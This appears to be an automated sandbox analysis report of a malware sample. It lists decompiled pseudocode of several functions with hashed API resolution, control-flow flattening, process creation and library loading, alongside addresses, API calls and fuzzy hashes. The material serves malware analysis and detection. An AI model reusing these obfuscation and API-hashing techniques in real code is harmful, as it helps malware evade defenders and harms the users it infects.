								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xf090f06a;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x58;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 4;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0xffffb93b;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0x26;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) | 0xa9426d85;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x2a;
								_t52 = 0x27153269;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xfad5ac24;
								continue;
							} else {
								if(_t52 == 0x27153269) {
									_t85 =  *0x29cddd0;
									if(_t85 == 0) {
										_t85 = E029C3E80(_t76, E029C3F20(0x7539f5a2), 0xf789cbad, _t102);
										 *0x29cddd0 = _t85;
									}
									_t95 =  *_t85(_t102 + 0x2c);
									_t52 = 0xb58c94f;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									if(_t52 != 0x302165a1) {
										goto L20;
									} else {
										_t52 =  ==  ? 0x7338f4f : 0xec2173f;
										continue;
									}
								}
							}
							L30:
						}
						if(_t104 == 0) {
							if(_t76 !=  *(_t103 + 0x10)) {
								goto L29;
							} else {
								_t52 = 0x7338f4f;
								goto L2;
							}
						} else {
							if(_t52 == 0x26fef4f) {
								_t90 =  *0x29ce25c;
								if(_t90 == 0) {
									_t90 = E029C3E80(_t76, E029C3F20(0xbb398380), 0x5b27858b, _t102);
									 *0x29ce25c = _t90;
								}
								 *_t90(_t100 + 0x14, _t102 + 0x2c, (_t95 - _t102 - 0x2c >> 1) + 1);
								_t77 =  *((intOrPtr*)(_t103 + 0x1c));
								 *(_t100 + 0x224) =  *(_t77 + 0x1c);
								 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t77 + 4)) + 1;
								 *(_t77 + 0x1c) = _t100;
								goto L29;
							} else {
								if(_t52 == 0x7338f4f) {
									_t68 =  *0x29cdea8;
									if(_t68 == 0) {
										_t68 = E029C3E80(_t76, E029C3F20(0xbb398380), 0x97f883e, _t102);
										 *0x29cdea8 = _t68;
									}
									_t101 =  *_t68();
									if( *0x29cdcec == 0) {
										 *0x29cdcec = E029C3E80(_t76, E029C3F20(0xbb398380), 0xe9233692, _t102);
									}
									_t71 = RtlAllocateHeap(_t101, 8, 0x228); // executed
									_t100 = _t71;
									if(_t100 == 0) {
										L29:
										return 1;
									} else {
										_t52 = 0x26fef4f;
										goto L1;
									}
								} else {
									if(_t52 != 0xb58c94f) {
										goto L20;
									} else {
										_t76 = E029C3D10(_t95);
										_t52 = 0x302165a1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L30;
						L20:
					} while (_t52 != 0x2c4ed872);
					return 1;
					goto L30;
				}
			}

0x029c30d2
0x029c30d6
0x029c30dc
0x029c30e1
0x029c30e6
0x029c30ea
0x029c30ea
0x029c30f0
0x029c30f0
0x029c30f0
0x029c30f0
0x029c30f5
0x00000000
0x00000000
0x029c31b1
0x029c3226
0x029c322e
0x029c3233
0x029c323b
0x029c3240
0x029c3248
0x029c324d
0x029c3255
0x029c325a
0x029c3262
0x029c326a
0x029c326f
0x029c327c
0x029c3280
0x029c3285
0x029c328d
0x029c3292
0x029c329f
0x029c32a3
0x029c32a8
0x00000000
0x029c31b3
0x029c31b8
0x029c31ec
0x029c31f4
0x029c320c
0x029c320e
0x029c320e
0x029c321a
0x029c321c
0x029c30ea
0x029c30ea
0x00000000
0x029c30ea
0x029c31ba
0x029c31bf
0x00000000
0x029c31c1
0x029c31cc
0x00000000
0x029c31cc
0x029c31bf
0x029c31b8
0x00000000
0x029c31b1
0x029c30fb
0x029c319c
0x00000000
0x029c31a2
0x029c31a2
0x00000000
0x029c31a2
0x029c3101
0x029c3106
0x029c32b5
0x029c32bd
0x029c32d5
0x029c32d7
0x029c32d7
0x029c32ee
0x029c32f0
0x029c32f7
0x029c32fd
0x029c3300
0x00000000
0x029c310c
0x029c3111
0x029c312e
0x029c3135
0x029c3148
0x029c314d
0x029c314d
0x029c3154
0x029c315d
0x029c3175
0x029c3175
0x029c3182
0x029c3184
0x029c3188
0x029c3306
0x029c330d
0x029c318e
0x029c318e
0x00000000
0x029c318e
0x029c3113
0x029c3118
0x00000000
0x029c311e
0x029c3125
0x029c3127
0x029c30ea
0x029c30ea
0x00000000
0x029c30ea
0x029c30ea
0x029c3118
0x029c3111
0x029c3106
0x00000000
0x029c31d4
0x029c31d4
0x029c31e9
0x00000000
0x029c31e9

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 029C3182

Strings

S=, xrefs: 029C3226
B, xrefs: 029C3262
&, xrefs: 029C328D

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &$B$S=
API String ID: 1279760036-3580750612
Opcode ID: f07510110c1189926abcca65669abdffbbe32b6d1415a4a040519e544b226fa5
Instruction ID: 28ebbd90bfc4f234959e01bfeed756198d18ab73ea1a1ea106595572643955e7
Opcode Fuzzy Hash: f07510110c1189926abcca65669abdffbbe32b6d1415a4a040519e544b226fa5
Instruction Fuzzy Hash: 7C51D572A083019BDB18DE28948466FB7E6FBD4354F308D6EE086C7310DB71DA458B97

Uniqueness

Uniqueness Score: -1.00%

Function 029C4BA0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E029C4BA0(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x29ce234;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E029C3E80(__ebx, E029C3F20(0xe66945e6), 0x8d9b356, __ebp);
					 *0x29ce234 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x29cde64 == 0) {
					 *0x29cde64 = E029C3E80(_t26, E029C3F20(0xbb398380), 0xcbbf9e7f, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x29cdc70;
						if(_t15 == 0) {
							_t15 = E029C3E80(_t26, E029C3F20(0xbb398380), 0x560d239b, _t46);
							 *0x29cdc70 = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x29cdc70;
						if(_t17 == 0) {
							_t17 = E029C3E80(_t26, E029C3F20(0xbb398380), 0x560d239b, _t46);
							 *0x29cdc70 = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x029c4ba0
0x029c4ba0
0x029c4ba0
0x029c4ba9
0x029c4bac
0x029c4bb0
0x029c4bc3
0x029c4bc8
0x029c4bc8
0x029c4bd6
0x029c4be0
0x029c4bea
0x029c4c02
0x029c4c02
0x029c4c21
0x029c4c25
0x029c4caa
0x029c4c27
0x029c4c2d
0x029c4c44
0x029c4c4b
0x029c4c5e
0x029c4c63
0x029c4c63
0x029c4c6c
0x029c4c6e
0x029c4c75
0x029c4c88
0x029c4c8d
0x029c4c8d
0x029c4c96
0x029c4ca2
0x029c4c2f
0x029c4c2f
0x029c4c35
0x029c4c43
0x029c4c43
0x029c4c2d

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 029C4C21

Strings

D, xrefs: 029C4BE0
Ei, xrefs: 029C4BB2

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: D$Ei
API String ID: 963392458-592548167
Opcode ID: bb82d0cd2b04554a013aa7cdcf948f050809d582e2fca239b4e5337d5a43f5f1
Instruction ID: c6414af54d1beff6b32033fb2783b01d5360a5e4deec9ed503bcf3512aacffa7
Opcode Fuzzy Hash: bb82d0cd2b04554a013aa7cdcf948f050809d582e2fca239b4e5337d5a43f5f1
Instruction Fuzzy Hash: 6221D175B443016BE714AB78EC60BAB37A6ABC0640F60892CF555CB290EF74D8158BA7

Uniqueness

Uniqueness Score: -1.00%

Function 0290002D, Relevance: 4.9, APIs: 3, Instructions: 387
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,02900005), ref: 029000E9
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,02900005), ref: 02900111

Memory Dump Source

Source File: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction ID: e49e7ad5335adbdf6f4dadad86432f3fa468b469b592baa4ad974e32a95ece13
Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction Fuzzy Hash: D8D1B171A0870A9FD724CF69C8C076AB3E5FF84318F18852DE899DB281E774E855CB91

Uniqueness

Uniqueness Score: -1.00%

Function 029C5CA0, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t5;
				void* _t8;
				void* _t10;

				E029C6530(_t8);
				if( *0x29ce094 == 0) {
					 *0x29ce094 = E029C3E80(_t5, E029C3F20(0xbb398380), 0xff20810a, _t10);
				}
				ExitProcess(0);
			}

0x029c5ca0
0x029c5cac
0x029c5cc4
0x029c5cc4
0x029c5ccb

APIs

ExitProcess.KERNEL32(00000000), ref: 029C5CCB

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: ed0153efc944eb1d23bb94aecd5d2f17556607894650a119bc5cd0f6fabfa8b8
Instruction ID: e850b84c655fed86e7193f8cbf51f67e0b526481edf5500362a994313de20799
Opcode Fuzzy Hash: ed0153efc944eb1d23bb94aecd5d2f17556607894650a119bc5cd0f6fabfa8b8
Instruction Fuzzy Hash: 91D0C921B4924097E600AAB1685076A255B4BC0640F70882DE5468B288EA6098118BD7

Uniqueness

Uniqueness Score: -1.00%

Function 02941D10, Relevance: 1.6, APIs: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.249702328.0000000002941000.00000020.00000001.sdmp, Offset: 02941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2941000_0TOEtGJHN8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 745d6c0ca42d806b293cdf5f67de6362361c6acb346e5e7f620e96454625ce5e
Instruction ID: 2769523c4d216310cd3ea0ba01b689f3d0dc7e5e01a9303dd5704586dfd21b9f
Opcode Fuzzy Hash: 745d6c0ca42d806b293cdf5f67de6362361c6acb346e5e7f620e96454625ce5e
Instruction Fuzzy Hash: 4D41B578A00109AFDB04CF54C494FAAB7B6FF88314F24C599E8195F355DB75EA82CB80

Uniqueness

Uniqueness Score: -1.00%

Function 029C6FB0, Relevance: 1.6, APIs: 1, Instructions: 107
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E029C6FB0(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t5;
				intOrPtr* _t6;
				intOrPtr* _t8;
				void* _t21;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x2f7561b9;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x16eb9dc5;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							E029C6F10(_t21, 0x29cd770, 4, __eflags);
							_t2 = 0x28da268b;
							continue;
						} else {
							_t55 = _t2 - 0x96aa655;
							if(_t55 > 0) {
								__eflags = _t2 - 0x129c963b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E029C6F10(_t21, 0x29cd7c0, 3, __eflags);
									_t2 = 0x16eb9dc5;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E029C6F10(_t21, 0x29cd840, 1, __eflags);
									_t2 = 0x6462a46;
									continue;
								} else {
									if(_t2 == 0x34398df) {
										E029C6F10(_t21, 0x29cd820, 0, __eflags);
										_t2 = 0x96aa655;
										continue;
									} else {
										_t57 = _t2 - 0x6462a46;
										if(_t2 != 0x6462a46) {
											goto L21;
										} else {
											E029C6F10(_t21, 0x29cd890, 2, _t57);
											_t2 = 0x129c963b;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2cd0d411;
					if(__eflags > 0) {
						__eflags = _t2 - 0x2f7561b9;
						if(__eflags != 0) {
							goto L21;
						} else {
							_t2 = 0x34398df;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 = E029C34C0(0x29cd7f0);
							__eflags =  *0x29cddc4;
							if( *0x29cddc4 == 0) {
								 *0x29cddc4 = E029C3E80(_t21, E029C3F20(0xbb398380), 0x9261db99, _t53);
							}
							_t5 = LoadLibraryW(_t51); // executed
							 *( *0x29ce2e8 + 0x28) = _t5;
							_t6 =  *0x29cdea8;
							__eflags = _t6;
							if(_t6 == 0) {
								_t6 = E029C3E80(_t21, E029C3F20(0xbb398380), 0x97f883e, _t53);
								 *0x29cdea8 = _t6;
							}
							_t48 =  *_t6();
							_t8 =  *0x29ce1a0;
							__eflags = _t8;
							if(_t8 == 0) {
								_t8 = E029C3E80(_t21, E029C3F20(0xbb398380), 0x26c3f343, _t53);
								 *0x29ce1a0 = _t8;
							}
							return  *_t8(_t48, 0, _t51);
						} else {
							__eflags = _t2 - 0x17b18c59;
							if(__eflags == 0) {
								E029C6F10(_t21, 0x29cd870, 6, __eflags);
								_t2 = 0x2cd0d411;
								goto L1;
							} else {
								__eflags = _t2 - 0x28da268b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E029C6F10(_t21, 0x29cd790, 5, __eflags);
									_t2 = 0x17b18c59;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x2a0eb481;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}

0x029c6fb0
0x029c6fb0
0x029c6fb0
0x029c6fb5
0x029c6fb5
0x029c6fb5
0x029c6fb5
0x029c6fba
0x00000000
0x00000000
0x029c6fc0
0x029c704a
0x029c704f
0x00000000
0x029c6fc2
0x029c6fc2
0x029c6fc7
0x029c701c
0x029c7021
0x00000000
0x029c7027
0x029c7031
0x029c7036
0x00000000
0x029c7036
0x029c6fc9
0x029c6fc9
0x029c7010
0x029c7015
0x00000000
0x029c6fcb
0x029c6fd0
0x029c6ffa
0x029c6fff
0x00000000
0x029c6fd2
0x029c6fd2
0x029c6fd7
0x00000000
0x029c6fdd
0x029c6fe7
0x029c6fec
0x00000000
0x029c6fec
0x029c6fd7
0x029c6fd0
0x029c6fc9
0x029c6fc7
0x00000000
0x029c6fc0
0x029c7059
0x029c705e
0x029c70a2
0x029c70a7
0x00000000
0x029c70a9
0x029c70a9
0x00000000
0x029c70a9
0x029c7060
0x029c7060
0x029c70cb
0x029c70d2
0x029c70d4
0x029c70ec
0x029c70ec
0x029c70f2
0x029c70fa
0x029c70fd
0x029c7102
0x029c7104
0x029c7117
0x029c711c
0x029c711c
0x029c7123
0x029c7125
0x029c712a
0x029c712c
0x029c713f
0x029c7144
0x029c7144
0x029c7151
0x029c7062
0x029c7062
0x029c7067
0x029c7093
0x029c7098
0x00000000
0x029c7069
0x029c7069
0x029c706e
0x00000000
0x029c7070
0x029c707a
0x029c707f
0x00000000
0x029c707f
0x029c706e
0x029c7067
0x029c7060
0x00000000
0x029c70b3
0x029c70b3
0x029c70b3
0x029c70be
0x00000000

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,029C68DC), ref: 029C70F2

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 939cfd6f3f27cf1e1d7b5953fac7776823be78f9bffe3e700f415c0b6f1332ba
Instruction ID: a9d59e4dce00b23e3cc899c3534400ead00d223d280386cb943fdfd7c33a2da6
Opcode Fuzzy Hash: 939cfd6f3f27cf1e1d7b5953fac7776823be78f9bffe3e700f415c0b6f1332ba
Instruction Fuzzy Hash: 8531A060B082015BDA28AAA964A03BB959FD7C1364F744C7EF106CB388CE65CD418FE7

Uniqueness

Uniqueness Score: -1.00%

Function 029C6F10, Relevance: 1.5, APIs: 1, Instructions: 45
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E029C6F10(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E029C34C0(__ecx);
				if( *0x29cddc4 == 0) {
					 *0x29cddc4 = E029C3E80(__ebx, E029C3F20(0xbb398380), 0x9261db99, _t31);
				}
				_t6 = LoadLibraryW(_t30); // executed
				 *( *0x29ce2e8 + 0xc + _t28 * 4) = _t6;
				_t7 =  *0x29cdea8;
				if(_t7 == 0) {
					_t7 = E029C3E80(_t15, E029C3F20(0xbb398380), 0x97f883e, _t31);
					 *0x29cdea8 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x29ce1a0;
				if(_t9 == 0) {
					_t9 = E029C3E80(_t15, E029C3F20(0xbb398380), 0x26c3f343, _t31);
					 *0x29ce1a0 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}

0x029c6f10
0x029c6f12
0x029c6f19
0x029c6f22
0x029c6f3a
0x029c6f3a
0x029c6f40
0x029c6f48
0x029c6f4c
0x029c6f53
0x029c6f66
0x029c6f6b
0x029c6f6b
0x029c6f72
0x029c6f74
0x029c6f7b
0x029c6f8e
0x029c6f93
0x029c6f93
0x029c6fa0

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,029C704F,029C68DC), ref: 029C6F40

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6d6cfec0a60955605d467b78332076125ecf7ecaf2175b10243109d21ad344ca
Instruction ID: 514275bc067edc8dab0db498ae5d38432605429d6bbbb20bed885ef3a8f1f16a
Opcode Fuzzy Hash: 6d6cfec0a60955605d467b78332076125ecf7ecaf2175b10243109d21ad344ca
Instruction Fuzzy Hash: 6B018F71F05201AFA714BBB5B45067B26AB9BC02847348C7CF046CB344EA309C124B96

Uniqueness

Uniqueness Score: -1.00%

Function 029C42F0, Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E029C42F0(void* __ebx, long __ecx) {
				intOrPtr* _t1;
				void* _t4;
				void* _t16;
				long _t17;
				void* _t18;

				_t8 = __ebx;
				_t1 =  *0x29cdea8;
				_t17 = __ecx;
				if(_t1 == 0) {
					_t1 = E029C3E80(__ebx, E029C3F20(0xbb398380), 0x97f883e, _t18);
					 *0x29cdea8 = _t1;
				}
				_t16 =  *_t1();
				if( *0x29cdcec == 0) {
					 *0x29cdcec = E029C3E80(_t8, E029C3F20(0xbb398380), 0xe9233692, _t18);
				}
				_t4 = RtlAllocateHeap(_t16, 8, _t17); // executed
				return _t4;
			}

0x029c42f0
0x029c42f0
0x029c42f6
0x029c42fb
0x029c430e
0x029c4313
0x029c4313
0x029c431a
0x029c4323
0x029c433b
0x029c433b
0x029c4344
0x029c4348

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 029C4344

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 24cdb92dbbe5a60015b450c29ef754ba991a11fee6ead22622bd9b9b458d4fa6
Instruction ID: 86eb697ccd01b93740f12a1ab1a805469f2183512a803f636a124b41995a7531
Opcode Fuzzy Hash: 24cdb92dbbe5a60015b450c29ef754ba991a11fee6ead22622bd9b9b458d4fa6
Instruction Fuzzy Hash: 17E065B2B451016BAB14A6B9B4646BB25ABABC0680374887DF406C7344EE708D024BE6

Uniqueness

Uniqueness Score: -1.00%

Function 029427B0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 029427D9

Memory Dump Source

Source File: 00000000.00000002.249702328.0000000002941000.00000020.00000001.sdmp, Offset: 02941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2941000_0TOEtGJHN8.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 536bb61c39df8d4d98771b4b090667b704da742672a22967d614b7e4f57e435a
Instruction ID: 95c13453466dca391f9cdd1f1d80623a1646a17b4e44efe5e82d73e3af85ac2d
Opcode Fuzzy Hash: 536bb61c39df8d4d98771b4b090667b704da742672a22967d614b7e4f57e435a
Instruction Fuzzy Hash: E4D05EB4D40208BFD700EFE4E90AF5CBBB4EB44305F108164E90467240EA703A148F52

Uniqueness

Uniqueness Score: -1.00%

Function 02941820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 0294182F

Memory Dump Source

Source File: 00000000.00000002.249702328.0000000002941000.00000020.00000001.sdmp, Offset: 02941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2941000_0TOEtGJHN8.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: b908908e666bf91e422ab0b282266983fec7a463935f1e57de264911c1b670e8
Instruction ID: 7062a90c7acc370899c68c43d69eb0560d7bb155145b83ced89323b2aa7fde9f
Opcode Fuzzy Hash: b908908e666bf91e422ab0b282266983fec7a463935f1e57de264911c1b670e8
Instruction Fuzzy Hash: 93C04C7A55420CBB8B04DF98E884DAB37FDBB8C614B148548BA1D87200C630F9108BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 029092DE, Relevance: 7.7, Strings: 6, Instructions: 224COMMON

Download Yara Rule

Strings

t<C7, xrefs: 0290932D
z}, xrefs: 02909311
Ei, xrefs: 029094AD
"-, xrefs: 029093CA
ource, xrefs: 02909498
t<C7, xrefs: 029095D7

Memory Dump Source

Source File: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: "-$ource$t<C7$t<C7$z}$Ei
API String ID: 0-1759977250
Opcode ID: e9951e02e279bf2fb8e96ac9af4ea0a0f1a4852d9572745ba4539eff4543d218
Instruction ID: 896091726a3611e7c1736f58474cc6eca6e8b7029145b846974765d406b2b4d5
Opcode Fuzzy Hash: e9951e02e279bf2fb8e96ac9af4ea0a0f1a4852d9572745ba4539eff4543d218
Instruction Fuzzy Hash: F481E171A083099FE324EF65D88465EB7EABBC4704F45492DF45ADB294E770D908CF82

Uniqueness

Uniqueness Score: -1.00%

Function 029C7740, Relevance: 6.5, Strings: 5, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E029C7740() {
				void* __ebx;
				void* __ebp;
				intOrPtr* _t84;
				signed int _t85;
				signed int _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				void* _t101;
				signed int _t106;
				void* _t117;
				intOrPtr* _t147;
				intOrPtr _t149;
				intOrPtr* _t152;
				intOrPtr _t158;
				short* _t160;
				void* _t164;
				void* _t166;
				void* _t172;
				void* _t177;
				void* _t179;

				 *(_t177 + 0x14) = 0xad9f;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) | 0x55c37b00;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) ^ 0xd5c3ff9e;
				 *(_t177 + 0x10) = 0x20cd;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 9;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0x00419a00;
				 *(_t177 + 4) = 0x7d7a;
				_push(_t117);
				 *(_t177 + 0x14) =  *(_t177 + 4) * 0x25;
				_t172 = 0;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) >> 0xa;
				_t164 = 0x37433c74;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) | 0x2c89345e;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) << 7;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) << 7;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) ^ 0x4d378000;
				 *(_t177 + 0x18) = 0xca95;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) + 0xcbf5;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) | 0x7c83d5b7;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) ^ 0x6758ba30;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) ^ 0x1bdb6d8d;
				 *(_t177 + 0x10) = 0xd33c;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 9;
				_t158 =  *((intOrPtr*)(_t177 + 0x2c));
				 *(_t177 + 0x10) = 0x38e38e39 *  *(_t177 + 0x10) >> 0x20 >> 1;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0xe07bc090;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) * 0x69;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 1;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 0xb;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0x0df2b000;
				 *(_t177 + 0x1c) = 0xac79;
				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) << 1;
				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) + 0x2d22;
				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) ^ 0x00018615;
				goto L1;
				do {
					while(1) {
						L1:
						_t179 = _t164 - 0x2d3069ff;
						if(_t179 <= 0) {
							break;
						}
						if(_t164 == 0x342fd613) {
							_t160 =  *0x29ce2ec + 0x278;
							while( *_t160 != 0x5c) {
								_t160 = _t160 + 2;
							}
							_t158 = _t160 + 2;
							_t164 = 0x2685696e;
							continue;
						} else {
							if(_t164 != 0x37433c74) {
								goto L9;
							} else {
